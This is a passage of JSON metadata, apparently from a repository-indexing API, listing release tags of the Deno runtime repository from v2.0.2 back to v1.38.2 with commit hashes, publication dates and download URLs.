.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at"